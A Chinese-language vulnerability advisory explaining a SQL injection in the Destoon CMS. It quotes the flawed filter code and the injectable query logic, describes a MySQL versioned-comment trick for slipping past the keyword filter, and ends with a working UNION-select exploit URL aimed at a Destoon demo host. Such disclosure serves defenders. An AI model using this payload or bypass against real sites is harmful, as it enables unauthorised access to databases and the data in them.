|Destoon最新全版本通杀SQL注入漏洞 - VULHUB开源网络安全威胁库

Destoon最新全版本通杀SQL注入漏洞

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： Destoon最新全版本通杀注入漏洞 ### 详细说明： /common.inc.php 64行： ------------------------------------------------------------------------------------- if($_POST) $_POST = strip_sql($_POST);//strip_sql()过滤 if($_GET) $_GET = strip_sql($_GET); if($_COOKIE) $_COOKIE = strip_sql($_COOKIE); ......... if($_POST) extract($_POST, EXTR_SKIP);//注册变量 if($_GET) extract($_GET, EXTR_SKIP); ------------------------------------------------------------------------------------- 跟进strip_sql() /include/global.func.php186行： ------------------------------------------------------------------------------------- function strip_sql($string) { $search = array("/union([[:space:]\/])/i","/select([[:space:]\/])/i","/update([[:space:]\/])/i","/replace([[:space:]\/])/i","/delete([[:space:]\/])/i","/drop([[:space:]\/])/i","/outfile([[:space:]\/])/i","/dumpfile([[:space:]\/])/i","/load_file\(/i","/substring\(/i","/ascii\(/i","/hex\(/i","/ord\(/i","/char\(/i"); $replace = array('union\\1','select\\1','update\\1','replace\\1','delete\\1','drop\\1','outfile\\1','dumpfile\\1','load_file(','substring(','ascii(','hex(','ord(','char('); return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string); } ------------------------------------------------------------------------------------ 采用了新的正则表达式，之前西毒放出的exp，已经无法绕过新版本的过滤了。此处可采用新的绕过方式：/!5000union*/ 首先寻找一个注射点： /module/member/record.inc.php16行： ------------------------------------------------------------------------------------------- isset($mid) or $mid = 0; isset($currency) or $currency = ''; $module_select = module_select('mid', $L['module_name'], $mid); if($keyword) $condition .= " AND title LIKE '%$keyword%'"; if($fromtime) $condition .= " AND paytime>".(strtotime($fromtime.' 00:00:00')); if($totime) $condition .= " AND paytime<".(strtotime($totime.' 23:59:59')); if($mid) $condition .= " AND moduleid=$mid"; if($itemid) $condition .= " AND itemid=$itemid"; if($currency) $condition .= " AND currency='$currency'"; $r = $db->get_one("SELECT COUNT(*) AS num FROM {$DT_PRE}finance_pay WHERE $condition");// $pages = pages($r['num'], $page, $pagesize); $lists = array(); echo "SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize"; $result = $db->query("SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize"); ------------------------------------------------------------------------------ 此处利用变量覆盖，就可以顺利构造sql注入 /member/record.php ----------------------------------------------------------------------------- <?php require 'config.inc.php'; require '../common.inc.php'; require DT_ROOT.'/module/'.$module.'/record.inc.php'; ?> ------------------------------------------------------------------------------ 引入了common.inc.php，所以存在变量覆盖。并且可以绕过正则的过滤。最终造成sql注入 exp：http://demo.destoon.com/v5.0/member/record.php?action=pay&mid=-1/*!50000union*//*!50000select*/user(),2,database(),version(),5,6,7,8,9-- ### 漏洞证明： [<img src="https://images.seebug.org/upload/201310/10152403514016e12dc3769c00b8086a8e706009.jpg" alt="QQ图片20131005131510.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/10152403514016e12dc3769c00b8086a8e706009.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™